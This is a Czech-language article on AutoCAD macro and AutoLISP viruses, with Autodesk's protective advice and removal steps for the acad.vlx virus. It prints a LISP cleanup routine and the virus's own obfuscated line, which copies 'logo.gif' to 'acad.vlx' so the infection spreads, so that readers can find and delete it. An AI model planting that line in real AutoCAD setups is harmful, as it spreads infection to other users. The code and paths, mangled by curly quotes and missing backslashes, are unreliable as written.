Na AutoCAD mají vliv dva hlavní typy virů, a to viry ukryté ve  VBA makrech, uložených ve výkresu či AutoLISPech, které se automaticky spouští s otevřením výkresu.

Viry ve VBA makrech

VBA makra se nachází v AutoCADu již od verze 2000, kdy bylo také umožněno připojit VBA projekty k dwg výkresu. Jakmile je VBA součástí výkresu, makro je aktivní již ve chvíli, kdy se otevře daný výkres. Jakmile sdílíte tento výkres s ostatními, napadené makro má možnost ovlivnit jakýkoliv další počítač. A co takové napadené makro může provést? Dokáže manipulovat s vašimi výkresovými daty, má ale i přístup k pevnému disku a do registrů, dokonce dokáže využít i API…tedy využít co může.

Viry založené na AutoLispech

Tyto viry většinou využívají ty lispy, které se spouští automaticky s otevřením výkresu. Takový typ AutoLispu obsahuje:

• acaddoc.lsp (e.g. acad2013doc.lsp):  soubor poskytovaný Autodeskem, který se spouští při otevření výkresu
• acad.lsp (e.g.acad2013.lsp):  soubor poskytovaný Autodeskem, který se spouští při otevření AutoCADu
• acaddoc.lsp: uživatelem vytvořený soubor, který se spouští při otevření výkresu  
• acad.lsp: starý druh souboru, který se spouští při otevření AutoCADu

Hlavním způsobem, jak se můžete nakazit virem z AutoLISPu, je skrze výše uvedené soubory. Například, obdržíte zabalenou složku výkresů (*.zip *.arch) a některý ze zabalených výkresů spouští AutoLisp. Jakmile rozbalíte tuto složku a otevřete některý z výkresů, bohužel dojde i k načtení poškozeného AutoLispu a tím dojde k zahájení činnosti samotného viru.

Nezapomeňte, že síla AutoLispu je značná. Nejen že ovlivňuje provádění příkazů v samotném AutoCADu, tak ovlivňuje i spouštění VBA maker, ale i spouštění samotných Windows, vytváření, editaci i smazání veškerých dat na pevném disku, tak i umožňuje kompletní přístup k registrům Windows.

Jak se chránit vůči virům v AutoCADu 2013

Vývojáři Autodesku si uvědomili vážnost situace, a tak pro AutoCAD 2013 připravili opravný balíček Service Pack 1, který obsahuje nové možnosti zabezpečení a tím brání virům ve zneužití. Více informací je zde http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=20327810&linkID=9240617

Jak se chránit vůči virům u předchozích verzí (2008 až 2012)

Naštěstí většina renomovaných antivirových programů ví o možných záludnostech souvisejících s AutoLispy, proto při jakémkoliv náznaku nebezpečí je umístí do karantény. Autodesk vám ale kromě použití antiviru doporučuje následující:

–      Nerozbalujte žádné komprimované soubory bez jejich předchozího prověření

• pozor na výkresy doprovázené soubory s koncovkou .EXE, .ARX

–      Nikdy nespouštějte neznámé LISP nebo VBA soubory

• na internetu najdete množství užitečných aplikací, nikdy ale nevíte, kdo je vytvořil. Před jejich vyzkoušením je raději prověřte.

–      Povolte antivirovou ochranu maker v AutoCADu

• Jelikož od začátku jsou makra možným zdrojem problémů, AutoCAD vždy zobrazoval hlášení v případě, že otevíráte výkres s připojeným makrem. Z tohoto dialogového okna máte možnost zakázat makro ještě před jeho spuštěním. Toto dialogové okno je ve výchozím stavu AutoCADu vždy zobrazeno. Pokud z nějakého důvodu se vám okno nezobrazuje, doporučujeme ho zaktivovat. Zadejte příkaz VBARUN. Zvolte Možnosti a zaškrtněte položku Povolit ochranu proti makrovirům.

Problémový acad.vlx soubor

Uživatelé AutoCADu upozornili na tento soubor, který dokáže poškodit výkres a navíc má za následek vymazání jazykového balíčku. Tento soubor se většinou uloží do složky Nápovědy, např. C:Program FilesAutoCAD 20xxHelplogo.gif . Dojde k modifikaci i dalších souborů a systémová proměnná _ ACADLSPASDOC je nastavena na 1, což umožní souboru acad.vlx se načíst do všech otevřených výkresů a poškodí je. Zde je postup, jak virus odstranit. Musíte mít administrátorská práva do systému Windows.

1, najděte složku Support : C:Program FilesAutoCAD 20xxSupport  a 2x klikněte na acad20xx.lsp. Do souboru vložte následující kód. To zajistí vyhledání a odstranění acad.vlx a logo.gif.

(defun cleanvirus( / lspfiles lspfile x)
  (setq lspfiles ‚(„acad.vlx“ „logo.gif“))
  (foreach lspfile lspfiles 
    (while (setq x (findfile lspfile))
      (progn
        (vl-file-delete x)
        (princ „nDeleted file „)
        (princ x)
      );progn
    );while
  );foreach
)
(cleanvirus)

2, Otevřete následující soubory

• C:Program FilesAutoCAD 20xxExpressacetauto.lsp
• C:Program FilesAutoCAD 20xxSupportai_utils.lsp
• ROAMABLEROOTPREFIXSupportacad.mnl

A vymažte následující kód:

(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

Soubory uložte.